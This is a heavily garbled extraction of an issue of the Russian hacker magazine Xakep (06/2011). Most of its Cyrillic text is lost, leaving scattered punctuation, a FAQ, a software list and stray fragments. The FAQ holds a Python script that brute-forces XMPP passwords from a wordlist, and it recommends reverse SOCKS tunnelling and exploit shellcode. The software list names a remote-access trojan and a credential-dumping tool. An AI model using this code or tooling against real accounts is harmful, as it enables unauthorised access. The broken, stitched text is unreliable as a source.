. ,
, , ,
.
,
. :
,
, , ;
,
;
( ),

;
134
-,
;
, ;
(. ) , , -
( , ,
);
, , .
?
,
,
,
.
. , -.
, , - ,
. ,
, .

- , , , .
,
:
, .
, ,
:
( , , )
.
: ,
X 06 /149/ 2011

, , ,
. , .

(goo.gl/iuzQL).
, ( ). ,
: ,
,
()
,
(
- ), , , : , .
X 06 /149/ 2011

, ,
. , ,
. , ?
:
,
.
, (
!,
).
- ,
.
, !.
: , , ,
, .
- -
135
UNITS
,

(, ).
, .
, ? :)

, : ,
.

.
:
, - .

.
: ,
; 5 . , , ,
(. ). , , (
) , .

(lushertest.ru),
, ,
. , - . ,
, .
136
:
,
,
.

, .
:
,
:
, ,
, . , ,
. , ,
,
, .
, 5-10 , , .
,
, , , -

, ,
.
, , ,
.
X 06 /149/ 2011
, 10. -
. . ,
, .
,
,
, , .
. , ,
, ,
. :
, . -
, -
,

: (),
(), ,
, , ,
.

,

.

5,
, .
X 06 /149/ 2011
,
,
.
,
,

(
),

,
,

.

()
.

.
:
,
;
,
-,
,
,

.
,

-
.
: ,
.
, Aphex
Twin
,

: ,
, ,
,
, ,

Klangfarbe,

.
137
UNITS
,
, .
,
, ,
, ,
.
(
) (
).
. :
, -
, , ,
, . , ,
, ,
, ,
.

,
, : ,
, ,
, .
- , ,
, .
, .
.
, .
, . , ,
.
, ,
.
, ,
. ,
.
, - ,
- : , (
)
.
,
.
, , ,
, .
, , , . ,
, ,
, , .
, , , :
, ,
. , ,
?.
: ,
. ,
, ,
- (, ), , ,
.
,
,
, . ,
, .

,
5-7
. ,
, ; ; , -
, .
:
.
, , , , .
, ,
.

, , .
,
138

, .
,
( ).
:
, ,
.
, , , - ;
, , ,
(,
!): -, , -
(, );
- , ,
, , .
: , ,
:). z
X 06 /149/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! ,
.
.
,
.
500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
UNITS
faq
united?

faq@real.xakep.ru
Q: -,
.exe-
Windows 7.
, ( milw0rm.
com) .
-,
Metasploit, Windows 7.
?
A:
-, security- Bkis (bit.ly/fXfbCH).
, , - 100% . ,
, -.

milw0rm.com, 100- -
SkyLined (code.google.com/p/w32-exec-calcshellcode), calc.exe 32- .
Q:
.
-

(
140
,
). ?
A: , . ,
Google Chrome ,
.
. ,
Google
Secbrowsing (bit.ly/hQNnVu),
.
Mozilla Firefox

Plugin Check (mozilla.com/en-US/
plugincheck),
-
. ,
.

Qualys BrowserCheck (browsercheck.qualys.
com). .

Secunia PSI (secunia.com/vulnerability_
scanning/personal). , ,
,

,
Q: ,
grep. ?
A: .
1. , grep
Windows .
GnuWin32 (gnuwin32.sf.net), Windows grep
(wingrep.com), GNU Grep For Windows (steve.
org.uk/Software/grep), Grep For
Windows (grepforwindows.com, pages.interlog.
com/~tcharron/grep.html) .
.
2. ( c XP)
, find findstr,
.
,
.
, .
:
echo findstr %1 %2 %3 %4 %5 >
%systemroot%\grep.cmd
%systemroot%,

, X 06 /149/ 2011
Project Ubertooth
Bluetooth-,
$100
. ,
grep, :
, Code
Coverage Analysis Tools Kcachegrind
(onInsert, onUpdate,
onRemov) .
C:\Windows\system32>netstat -an | grep LISTEN

C:\Windows\system32>findstr LISTEN
TCP 0.0.0.0:80
0.0.0.0:0
LISTENING
TCP 0.0.0.0:135
0.0.0.0:0
LISTENING
TCP 0.0.0.0:443
0.0.0.0:0
LISTENING
[...]
3. PowerShell
grep select-string.
xakep :
select-string .\*.* -pattern "xakep"
, select-string . ,
, C:\ txt-
,
:
get-childitem c:\ -include *.txt -rec \
| select-string -pattern \
"\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}"
Q: - -? -
SQLite, -?
A: ,
, JavaScript.

, Taffy DB (taffydb.com).
JS-,
-.
SQL,
. :
;
;
10 ;
;
AJAX: JQuery, Dojo, Prototype, EXT
;
CRUD- (
Create, Read, Update, Delete);
;
;
X 06 /149/ 2011
Q: ,
. ?
A: JavaScript
Shortcuts Library (stepanreznikov.com/
js-shortcuts) , . ,
.
.
1. :
$.Shortcuts.add({
type: 'down',
mask: 'Ctrl+A',
handler: function() {
debug('Ctrl+A');
}
});
2. :
$.Shortcuts.add({
type: 'up',
mask: 'Shift+B',
handler: function() {
debug('Shift+B');
}
});
3. :
$.Shortcuts.start();
! ,
, ,
.
, Ctrl, Shift Alt.
:
: Ctrl, Shift, Alt;
: 09;
: AZ (case-insensitive);
: Backspace, Tab,
Enter, Pause, CapsLock, Esc, Space, PageUp,
PageDown, End, Home, Left, Up, Right, Down,
Insert, Delete, F1F12, , ,
.

( type),
:
down
;
up ;
hold (
,
).

.
: stepanreznikov.com/
js-shortcuts.
Q:
Windows,
Mac OS X, Dock,
.
, ,
. ?
A: Lion Skin Pack 3.0 For Seven
(hameddanger.deviantart.com/#/d3bg7fq).
, ,
,
Mac OS X Lion.
Q: ,
, ,
.
SOCKS-,
(
, -
).
SOCKS.
?
A: SOCKS (reverse) . sSocks
(sourceforge.net/projects/ssocks).
.

rcsocks, .
(, 1080)
(backconnect) -
141
UNITS
, (
1088) .

rssocks,
IP- (1080).
! , reverse-,

SOCKS- ( 1088)

(-, SSH- ).
: vimeo.
com/22515255.
Q: Jabber
(XMPP),
.
A:
THC-Hydra (thc.org/thc-hydra)
XMPP-. ,
,
XMPP, .
XMPP
Python
:
JID = name@server.org
for password in wordlist:
JID = xmpp.protocol.JID(JID)
client = xmpp.Client(
JID.getDomain(), debug=[])
conn = client.connect()
auth = client.auth(
JID.getNode(), password,
resource=JID.getResource())
if auth == 'sasl':
print password
sys.exit(1)
client.disconnect()
Q:

?
A: , - ,
-,
.
:
1. GMER (gmer.net);
2. RootRepeal (sites.google.com/site/
rootrepeal);
3. RkUnhooker (bit.ly/dOYgBO).
:
,
, ,
NTFS. , ,
, , ,
TCP/IP-.
SSDT/IDT/IRP.
142
Q:
,

? ,
- Pandora (pandora.com)?
,

IP. ?
- (, ,
) .
?
A: VPN-. ,
,
VPN
Amazon. ,
,
, IP-.
,

Free Hide IP (free-hideip.com).
,
.
Q: -
.
.

WinPcap,
.
A: RawCap (netresec.com/
?page=RawCap). 17 ,

DLL-.
.NET Framework 2.0. (
Wi-Fi) pcap-.
, Vista Windows 7
-
RAW-.
Q: ,
Bluetooth-
?

( Wi-Fi )
?
A: .
Wi-Fi, , , Bluetooth
.
ShmooCon 2011 ( bit.
ly/dJWAsC),
Ubertooth (ubertooth.sourceforge.
net). ? .

BT- ,
$1000. :

$100. Ubertooth One
Bluetooth- BT-.
,
.
, USB- ,
ARM Cortex-M3.
,
promiscuous,

Bluetooth-,
.
Kismet
(kismetwireless.net).
Q:
Windows
.
A: Code Coverage
Analysis Tools (github.com/Cr4sh/Codecoverage-analysis-tools)
Cr4sh.
PIN (pintool.org),

.

:
1. PIN
.
2. Coverager.dll
PIN.
3. execute_pin.bat
, PINPATH PIN.
4. BAT- :
execute_pin_calls.bat calc.exe
5.

CoverageData.log.<N>, <N>
, .

,
Calltree Profile Format:
python coverage_to_callgraph.py \
<log_file_path> <thread_number> [options]
6. Callgrind.out,

Kcachegrind (sourceforge.net/
projects/precompiledbin).
: esagelab.
ru/blog. z
X 06 /149/ 2011
>Net
Acrylic DNS Proxy
Connex Network Manager
ExpanDrive
Fiddler 2.3.3.3
freeSSHd 1.2.6
GDocsDrive
GeeMail
mRemote 1.50
MyEnTunnel 3.4.2.1
PuTTY Connection Manager
Royal TS 1.7.2
>Multimedia
8 Skin Pack 1.0 For 7
Gmail Notifier Pro 2.1
Lion Skin Pack 4.0 For Win 7
Marble 1.1.0
MPTagThat 2.0.4
Office Tabs 6.51
Pulse Beta 1
SmillaEnlarger 0.9.0
Songr 1.9.20
Swish 0.4.6
Tiny Burner1.0
Tunatic v1.0.1b
>Misc
CameraMouse2011
Depeche View 1.4.6
Ditto-cp 3.17
Dolphin Text Editor Menu 1.8
Duplicate Commander 2.1
Explorer7Fixes 1.0.0.2
FluffyApp 1.0b9
Free Time Tracker 1.0
GeeTeeDee 0.1.175
iPrint 6
Klok Free 2.3.2
MadAppLauncher 1.0.0.0
min.us for windows
Orbit Downloader 4.1.0.0
Shapeshifter 4.01
SnakeTail 1.3
Windows Double Explorer 0.4
>Devel
AutoGen 5.11.5
Bashdb 4.2-0.7
Boa Constuctor 0.2.3
CVS 1.11.23
>>UNIX
>Desktop
Audacious 2.5.0
Blender 2.57
DraftSight
Fvwm 2.6.0
GIMP 2.7.2
Kdenlive 0.8.0
Kupfer 2.06
Marble 1.1
Notecase 1.9.8
Pdfmod 0.9.1
PyBookReader 0.5.0
Rawstudio 2.0
SnapFly 0.8
SSHMenu 3.18
TaskJuggler 0.0.11
Texmaker 3.0.2
ThinkingRock 2.2.1
UMPlayer 0.92
>System
Comodo Antivirus for Windows
Comodo Firewall for Windows
Dropboxifier v0.1.6
Folder Size 1.9.0.0
Free VM Configuration Tool 1.0
FreeFileSync 3.16
MyEventViewer 1.55
Q-Dir 4.54
SafeHouse Explorer 3.01
WhatIsHang 1.00
>Security
DarkComet-RAT v3.3 FWB
DB Audit 4.2.29
Google Hack Database 1.1
Hakit Proxy v1
PANFinder
PVDasm v1.7b
RawCap
REC Studio 4
Retina Scaner 5.12.1
SWFREtools
TCHunt v1.5
V3RITY Data Block Examiner for
Oracle
Vistumbler v10.1 beta 5
Volatility 1.3Beta
Watcher 1.5.2
Windows Credentials Editor v1.2
streamwriter 2.0.0.0
TeraTerm Pro Web 3.1.3
Tunngle 4.3.2.0
UltraVNC 1.0.9.5
USBWebserver V8
Wireshark 1.4.6
Yakoon 2.0.0
>Server
Apache 2.2.17
BIND 9.8.0
Boa 0.94.13
CUPS 1.4.6
DHCP 4.2.1
Dnsmasq 2.57
>Security
ArpON 2.0
BeEF 0.4.2.4 alpha
BFBTester 2.0.1
BodgeIt 1.1.0
Cameloid 1.8c
DNSpoison 1.0
Google Hack DB Tool 1.1
Hatkit Proxy 0.5.1
Netifera 1.0
oclHashcat lite 0.05
Portsentry 1.2
Pytbull Testing Framework 0.3
Sqlmap 0.9
sslsnoop 0.6
SWFRETools
theHarvester 2.0
Yersinia 0.7.1
Zed Attack Proxy 1.2.0
>Net
Autossh 1.4b
Bandwidthd 2.0.1
BitlBee 3.0.2
BitStormLite 0.2q
Bit-Twist 1.1
Cftp 0.12
Dante 1.2.3
Dns2tcp 0.5.2
dnsproxy 1.16
ffproxy 1.6
Firefox 4.0.1
Google Chrome 11.0.696.57
Jabberd 2.2.13
Knockd 0.5
NOC 0.6.3
Opera 11.10
Psi 0.14
Skype 2.2
>Games
Family Farm
DDD 3.3.12
Groovy 1.8
HT 2.0.18
Indent 2.2.9
libvirt 0.9.0
LLVM 2.9
NetBeans 7.0
PCC 1.0
Pydb 1.26
PyPy 1.5
QtSDK 1.1
SPE 0.8.4
Tapper
XtraBackup 1.6
>>MAC
Blender 2.57b
BlueGriffon 1.0pre1
Bricksmith 2.5
EasyFind 4.7.2
eMaps 2.2.5
Firefox 4.0.1
Google Chrome 11.0.696.57
Growl 1.2.1
Gruml 0.9.25.121
ipswDownloader 0.4
Pashua 0.9.4.5
Silverlight 4.0.60310.0
SmartSVN 6.6.7
TenFourFox 4.0.1
TeXMaker 3.0.2
TeXShop 2.41
The Unarchiver 2.7.1
xACT 2.11
XMenu 1.9.3
YoruFukurou 2.4
>X-distr
CentOS 5.6
>System
Alsa 1.0.24
Bochs 2.4.6
ClusterSSH 3.28
Conky 1.8.1
Cupt 2.0.0
Linux Kernel 2.6.38.5
Loggerfs 0.5
NetXMS 1.0.11
QKernelBuilder 1.2
Sadms 2.0.15
SystemTap 1.4
Watsup 1.9
Xnee 3.09
Exim 4.75
nginx 1.0.0
Nut 2.6.0
OpenLDAP 2.4.25
OpenSSH 5.8
OpenVPN 2.2.0
Postfix 2.8.2
PostgreSQL 9.0.4
Samba 3.5.8
Sendmail 8.14.4
Snort 2.9.0
Squid 3.1.12
/ C *NIX
06(149) 2011
>>WINDOWS
>Development
Aptana Studio 3.0.1
Assembly Studio 1.0
Bamcompile 1.21
CodeCompare 2.60.5
HexAssistant 2.7
IncrediBuild 3.51
NetBeans 7.0
PE Explorer
PowerGUI 2.4.0
Programmers Notepad 2.2
py2exe 0.6.9
Python Tools for Visual Studio
Beta2
Qt Creator 2.2
Selenium IDE 1.0.10
SQL Decryptor 1.1.0
Titanium Developer
x 06 (149) 2011
149
PHP
. 106
HTML5

: 2
10
.
Silverlight:
CISCO
UAC

WEB-
Linux
. 56
*NIX-
06 (149) 2011
GOOGLE CHROME . 62
UNITS
HTTP://WWW2
DUSHARE
dushare.com
URLQUERY
urlquery.net
- ,
rapidshare.com,
. .

. dushare. ,
. Flash, dushare
(P2P),
-. , ,
.
.
-
, . urlQuery , ,
Java- HTTP-.
, .
:
-
.
, .
INSTAPAPER
instapaper.com
CODECANYON
codecanyon.net
, . : ?
, ,
Instapaper.
( Read later)
.
,
-,
(iPad/
iPhone, Kindle).
,

. , .
, , . CodeCanyon
- (JavaScript, PHP Scripts, .NET, Plugins, CSS, HTML5)
(iOS, Android). :
JS, $5, 1065
. CodeCanyon
. .
144
X 06 /149/ 2011

90

.
210
:

PWN2OWN: . 82
05 (148) 2011
VOIP
5 DVD

VOIP-
. 60
PHREAKING
. 130
Linux USB-
Red.Button:
Twitter

MS08- 067:
WINDOWS
. 68
=90
www.xakep.ru/podpiska

Хакер 2011 06 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 06 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

x 06 (149) 2011

TMG, NIS, GAPA

FSP AURUM GOLD 700 (AU-700)

.: (495) 935-7034, : (495) 545-0906

WEXLER.HOME 903 Windows 7 .

Intel Core i5-650 3,2 - 4 . CPU

GeForce GTX 460,

Brande Finance Google

. Commodore Commodore VIC-Slim,

+ GPU Adreno 220 768

4% 130 000 000 Avast

(RMS) 60. 160-20000

Acer Aspire TimeL

Dell Vostro 3300

Dell Vostro 3300

Acer Aspire TimeLineX 3820T

Acer Aspire TimeLineX 3820T

0 1000 2000 3000 4000 5000 6000 7000 8000

Dell Vostro 3300

Dell Vostro 3300

Acer Aspire TimeLineX 3820T

Acer Aspire TimeLineX 3820T

0 1000 2000 3000 4000 5000 6000 7000 8000

Dell Vostro 3300

Dell Vostro 3300

Acer Aspire TimeLineX 3820T

Acer Aspire TimeLineX 3820T

0 20 40 60 80 100 120 140 160 180 200

FSP AURUM GOLD 700 (AU-700)

Parallels Desktop SmartMount,

Windows Windows Mac OS X.

Might & Magic

CSS3 Flexible Box Layout

, EcmaScript5 Strict Mode,

Internet Explorer Platform Preview 1

web ASP.NET MVC 3. ,

Windows Phone OS 7.5

2011 Windows Phone

Kinect for Windows SDK

SQL JOOMLA! COM_

MPlayer Lite 33064

Google 230 000 000

# pop pop ret (SEH)

windows. , ( Acrobat Reader), .

idlepc get routername

Network device list

(Dynamic Trunk Protocol)

_Forge Cisco D Packets

Forge Spanning-Tree BPDUs

( 18 368 ) Gmail Google Mail

XSS Google Mail Checker Plus

XSS Google Mail Checker Plus

var dump = ' LOCALSTORAGE: ';

Zdes Bil Ya. ,

BlackHole exploit kit

Help and Support

Microsoft Security Essentials .

Epic Fail Microsoft

scService = OpenService(scManager, svcName,

File not found

standart guest drivers

cgroup /var/cgroup cgroup defaults 0 0